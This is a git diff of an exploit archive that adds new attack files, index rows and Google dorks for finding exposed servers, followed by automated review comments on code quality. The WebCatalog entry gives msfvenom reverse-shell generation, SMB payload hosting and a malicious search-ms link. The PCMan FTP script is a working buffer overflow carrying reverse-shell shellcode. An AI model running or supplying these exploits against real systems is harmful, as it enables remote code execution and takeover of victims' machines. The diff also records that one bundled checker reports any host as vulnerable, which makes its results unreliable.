required=True, help="URL to send the HTTP request") + parser.add_argument("-o", "--output", help="Output file to save the HTML content") + parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode") + + args = parser.parse_args() + send_request(args.url, args.output, args.verbose) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/remote/51765.txt b/exploits/windows/remote/51765.txt new file mode 100644 index 0000000000..8a63394f68 --- /dev/null +++ b/exploits/windows/remote/51765.txt 
@@ -0,0 +1,40 @@ +# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution +# Date: 9/27/2023 +# Exploit Author: ItsSixtyN3in +# Vendor Homepage: https://webcatalog.io/en/ +# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe +# Version: 48.4.0 +# Tested on: Windows +# CVE : CVE-2023-42222 + +Vulnerability summary: +WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. + +Exploit details: + +- Create a reverse shell file. + +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe + + + +- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) + +python3 smbserver.py Tools -smb2support + + + +- Have the user sync a page with the payload as a renamed link + +[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) + + + +Payload: +search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title + +Tobias Diehl +Security Consultant +OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 +Pronouns: he/him +e-mail: tobias.diehl@bulletproofsi.com \ No newline at end of file diff --git a/exploits/windows/remote/51767.py b/exploits/windows/remote/51767.py new file mode 100755 index 0000000000..5e5530a60d --- /dev/null +++ b/exploits/windows/remote/51767.py 
@@ -0,0 +1,65 @@ +# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow +# Date: 09/25/2023 +# Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) +# Vendor Homepage: http://pcman.openfoundry.org/ +# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Version: 2.0 +# Tested on: Windows XP SP3 + +#!/usr/bin/python + +import socket + +#buffer = 'A' * 2500 +#offset = 2007 +#badchars=\x00\x0a\x0d +#return_address=0x7e429353 (USER32.dll) +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" +#nc -nvlp 4444 + +overflow = ( +"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" +"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" +"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" +"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" +"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" +"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" +"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" +"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" +"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" +"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" +"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" +"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" +"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" +"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" +"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" +"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" +"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" +"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" +"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" +"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" +"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" +"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" 
+"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" +"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" +"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" +"\xd7") + +shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow + +# Change IP/Port as required + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +try: + print "\nSending evil buffer..." + s.connect(('192.168.146.135',21)) + data = s.recv(1024) + s.send('USER anonymous' +'\r\n') + data = s.recv(1024) + s.send('PASS anonymous\r\n') + s.send('pwd ' + shellcode + '\r\n') + s.close() + print "\nExploit completed successfully!." +except: + print "Could not connect to FTP!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5fa49729d7..3ba9c7364e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -3036,6 +3036,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51053,exploits/hardware/dos/51053.txt,"DLink DIR 819 A1 - Denial of Service",2023-03-25,whokilleddb,dos,hardware,,2023-03-25,2023-03-25,0,CVE-2022-40946,,,,, 32305,exploits/hardware/dos/32305.txt,"Dreambox - Web Interface URI Remote Denial of Service",2008-08-29,"Marc Ruef",dos,hardware,,2008-08-29,2014-03-17,1,,,,,,https://www.securityfocus.com/bid/30919/info 19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware,,1999-09-27,2012-07-01,1,CVE-1999-1533;OSVDB-13556,,,,,https://www.securityfocus.com/bid/665/info +51774,exploits/hardware/dos/51774.txt,"Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS",2024-02-02,LiquidWorm,dos,hardware,,2024-02-02,2024-02-02,0,,,,,, 18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",dos,hardware,,2012-03-31,2012-03-31,1,OSVDB-80815;OSVDB-80814;CVE-2012-0407;CVE-2012-0406,,,,,http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm 18734,exploits/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",dos,hardware,,2012-04-12,2012-04-12,1,OSVDB-81147;OSVDB-81146;CVE-2012-2277;CVE-2012-2276,,,,, 21791,exploits/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",dos,hardware,,2002-09-13,2012-10-07,1,CVE-2002-1501;OSVDB-10063,,,,,https://www.securityfocus.com/bid/5703/info 
@@ -4337,6 +4338,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,, +51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51775,exploits/hardware/webapps/51775.txt,"Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51773,exploits/hardware/webapps/51773.py,"Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",webapps,hardware,,2017-06-26,2017-06-26,0,,,,,, 47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7255,,,,, 47622,exploits/hardware/webapps/47622.py,"eMerge E3 
1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7257,,,,, @@ -4898,6 +4904,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,, 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,, 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,, +51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, +51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 34254,exploits/hardware/webapps/34254.txt,"TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution",2014-08-03,"Christoph Kuhl",webapps,hardware,,2014-08-03,2016-09-12,0,OSVDB-109840;OSVDB-109839,,,,, 46882,exploits/hardware/webapps/46882.txt,"TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting",2019-05-21,"purnendu ghosh",webapps,hardware,,2019-05-21,2019-05-21,0,CVE-2019-12195,"Cross-Site Scripting (XSS)",,,, 44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,,2018-05-28,2018-05-28,0,,,,,, 
@@ -22021,6 +22029,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3799,exploits/php/webapps/3799.txt,"JulmaCMS 1.4 - 'file.php' Remote File Disclosure",2007-04-25,GoLd_M,webapps,php,,2007-04-24,2016-09-30,1,OSVDB-35387;CVE-2007-2324,,,,http://www.exploit-db.comjulma.zip, 2628,exploits/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,webapps,php,,2006-10-22,,1,OSVDB-35737;CVE-2006-6635,,,,, 29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",webapps,php,,2013-11-25,2013-11-25,0,CVE-2013-6618;OSVDB-92227,,,,, +51776,exploits/php/webapps/51776.py,"Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)",2024-02-02,whiteOwl,webapps,php,,2024-02-02,2024-02-02,0,,,,,, 4781,exploits/php/webapps/4781.php,"Jupiter 1.1.5ex - Privilege Escalation",2007-12-24,BugReport.IR,webapps,php,,2007-12-23,,1,OSVDB-52931,,,,,http://www.bugreport.ir/?/23 28582,exploits/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31529,,,,,https://www.securityfocus.com/bid/20048/info 28584,exploits/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",webapps,php,,2006-09-15,2013-09-28,1,CVE-2006-4874;OSVDB-31531,,,,,https://www.securityfocus.com/bid/20048/info 
@@ -23630,6 +23639,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip, 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,, +51766,exploits/php/webapps/51766.txt,"mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page",2024-02-02,"Astik Rawat",webapps,php,,2024-02-02,2024-02-02,0,,,,,, 51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,, 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,, 9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,, 
@@ -44654,6 +44664,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",remote,windows,,2009-09-12,2013-09-25,1,CVE-2006-5034;OSVDB-28808,,,,,https://www.securityfocus.com/bid/19958/info 4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,remote,windows,,2007-10-11,,1,OSVDB-43481;CVE-2007-5446,,,,, 39662,exploits/windows/remote/39662.rb,"PCMan FTP Server - 'PUT' Buffer Overflow (Metasploit)",2016-04-05,Metasploit,remote,windows,21,2016-04-05,2016-10-31,1,OSVDB-94624,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z, +51767,exploits/windows/remote/51767.py,"PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow",2024-02-02,"Waqas Ahmed Faroouqi",remote,windows,,2024-02-02,2024-02-02,0,,,,,, 26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,remote,windows,,2013-06-30,2013-06-30,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z, 40704,exploits/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Remote Buffer Overflow",2016-11-03,Cybernetic,remote,windows,,2016-11-03,2016-11-03,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-03-at-182757.png,http://www.exploit-db.comPCMan.7z, 40670,exploits/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Remote Buffer Overflow",2016-10-31,ScrR1pTK1dd13,remote,windows,,2016-10-31,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-10-31-at-233222.png,http://www.exploit-db.comPCMan.7z, 
@@ -45378,6 +45389,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1374,exploits/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution",2005-12-15,"Mariano Nuñez",remote,windows,,2005-12-14,,1,OSVDB-21746;CVE-2005-4270,,,,, 23514,exploits/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Remote Buffer Overflow",2004-01-04,"Peter Winter-Smith",remote,windows,,2004-01-04,2012-12-20,1,CVE-2004-1784;OSVDB-3312,,,,,https://www.securityfocus.com/bid/9351/info 7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,, +51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,, 16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,, 3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz, 37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,, diff --git a/ghdb.xml b/ghdb.xml index b58aeab7df..9f94ad5427 100644 --- a/ghdb.xml +++ b/ghdb.xml 
@@ -32887,6 +32887,19 @@ Dxtroyer</textualDescription> <date>2017-06-09</date> <author>anonymous</author> </entry> + <entry> + <id>8401</id> + <link>https://www.exploit-db.com/ghdb/8401</link> + <category>Files Containing Juicy Info</category> + <shortDescription>"Started by upstream project" ext:txt</shortDescription> + <textualDescription>Author: nadirb19 +Google Dork: "Started by upstream project" ext:txt</textualDescription> + <query>"Started by upstream project" ext:txt</query> + <querystring>https://www.google.com/search?q="Started by upstream project" ext:txt</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>4162</id> <link>https://www.exploit-db.com/ghdb/4162</link> @@ -34966,6 +34979,20 @@ Twitter: https://www.twitter.com/la_usch <date>2004-10-16</date> <author>anonymous</author> </entry> + <entry> + <id>8400</id> + <link>https://www.exploit-db.com/ghdb/8400</link> + <category>Files Containing Juicy Info</category> + <shortDescription>ext:java intext:"executeUpdate"</shortDescription> + <textualDescription># Exploit Title: Sensitive data in java files +# Google Dork: ext:java intext:"executeUpdate" +# Exploit Author: BULLETMHS</textualDescription> + <query>ext:java intext:"executeUpdate"</query> + <querystring>https://www.google.com/search?q=ext:java intext:"executeUpdate"</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>BULLETMHS</author> + </entry> <entry> <id>7917</id> <link>https://www.exploit-db.com/ghdb/7917</link> 
@@ -116819,6 +116846,19 @@ Linkedin: https://www.linkedin.com/in/hemantsolo/ <date>2020-06-08</date> <author>Hemant Patidar</author> </entry> + <entry> + <id>8402</id> + <link>https://www.exploit-db.com/ghdb/8402</link> + <category>Vulnerable Servers</category> + <shortDescription>intitle:"Installation Wizard - PowerCMS v2"</shortDescription> + <textualDescription>Author: nadirb19 +Dork: intitle:"Installation Wizard - PowerCMS v2"</textualDescription> + <query>intitle:"Installation Wizard - PowerCMS v2"</query> + <querystring>https://www.google.com/search?q=intitle:"Installation Wizard - PowerCMS v2"</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>753</id> <link>https://www.exploit-db.com/ghdb/753</link> @@ -116940,6 +116980,20 @@ Demewoz Agegnehu | Sabean Technology | https://sabtechx.com</textualDescription> <date>2020-10-01</date> <author>Alexandros Pappas</author> </entry> + <entry> + <id>8403</id> + <link>https://www.exploit-db.com/ghdb/8403</link> + <category>Vulnerable Servers</category> + <shortDescription>intitle:"Welcome to iTop version" wizard</shortDescription> + <textualDescription>Author: nadirb19 +Dork: intitle:"Welcome to iTop version" wizard +</textualDescription> + <query>intitle:"Welcome to iTop version" wizard</query> + <querystring>https://www.google.com/search?q=intitle:"Welcome to iTop version" wizard</querystring> + <edb></edb> + <date>2024-02-02</date> + <author>nadirb19</author> + </entry> <entry> <id>6419</id> <link>https://www.exploit-db.com/ghdb/6419</link>
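Review bot: In exploits/php/webapps/51776.py, send_request() prints "The Target Device is Vulnerable to: CVE-2023-36845" on any HTTP 200 and never inspects the response body, so every host that answers the POST with 200 is reported as vulnerable. The else branch's "Not Vulnerable" is just as unsupported when the non-200 status comes from something in front of the device. The verdict should depend on the expected phpinfo() output being present in the body. requests.post() is also called without a timeout, so one unresponsive host hangs the run, and stream=True does nothing useful because response.text reads the whole body anyway. In the header, the Version list is split mid-token across two comment lines ("22." then "4R2-S1/R3"), and the argparse description "Custom curl-like script" does not describe what the tool does.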
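Review bot: The header of exploits/windows/remote/51765.txt contradicts itself on versions: the title and Version field say 48.4 / 48.4.0, the summary says "WebCatalog before version 48.8", and Software Link points at the "WebCatalog Setup 52.3.0" installer, which by the summary's own statement is not an affected build. State the affected range once and either link a matching build or drop the link. The file also ends with a personal e-mail signature block (name, certifications, pronouns, address) under a name that differs from the Exploit Author field; that block should be removed from the entry, and "the victims machine" in the summary needs its apostrophe.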
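Review bot: In exploits/windows/remote/51767.py the "#!/usr/bin/python" line sits below the header comments, so it is not a shebang even though the file is added with mode 100755. The body is also Python 2 only (print statements), which the header does not say. The bare "except:" prints "Could not connect to FTP!" for every failure, including errors raised after the connection succeeded, so the message can be wrong; catch socket.error and report the actual exception. The variable names are swapped relative to their contents ("overflow" holds the msfvenom output, "shellcode" holds the whole buffer), and the target address is hard-coded under a "Change IP/Port as required" comment rather than taken as an argument.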
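Review bot: The new files_exploits.csv rows for 51776 (hunk @@ -22021) and 51765 (hunk @@ -45378) leave the CVE/OSVDB column (the field after the verified flag) empty, although the headers of 51776.py and 51765.txt in this same patch give CVE-2023-36845 and CVE-2023-42222, and neighbouring rows such as 29544 carry their CVE in that field. Fill it in so the entries can be found by CVE. The 51767 row (hunk @@ -44654) likewise leaves the port field empty while the script connects to port 21 and the adjacent PCMan row 39662 records 21.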
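Review bot: In the @@ -4898 hunk of files_exploits.csv the two added TL-WR740N rows spell the vendor differently ("TP-LINK" in 51769, "TP-Link" in 51768), and 51768 is titled "UnAuthenticated Directory Transversal". The term is "Traversal"; the existing row 51606 carries the same misspelling, so a search for "Directory Traversal" misses both. Normalise the vendor casing to match the surrounding rows and correct the spelling in the new row, ideally together with 51606.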
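Review bot: The four added ghdb.xml entries (8400 to 8403) lay out textualDescription three different ways ("Google Dork:" in 8401, "Dork:" in 8402 and 8403, and a "# Exploit Title:" comment block in 8400), and 8403 leaves a stray newline before the closing tag; pick one layout for all four. Each querystring also places the raw dork, spaces and double quotes included, directly after "?q=" without URL-encoding, so the value is not a valid URL as written unless that is already this file's convention. Entry 8400 is described as "Sensitive data in java files", but its query, ext:java intext:"executeUpdate", matches any indexed Java source that calls executeUpdate; the description should say what in the results is actually sensitive.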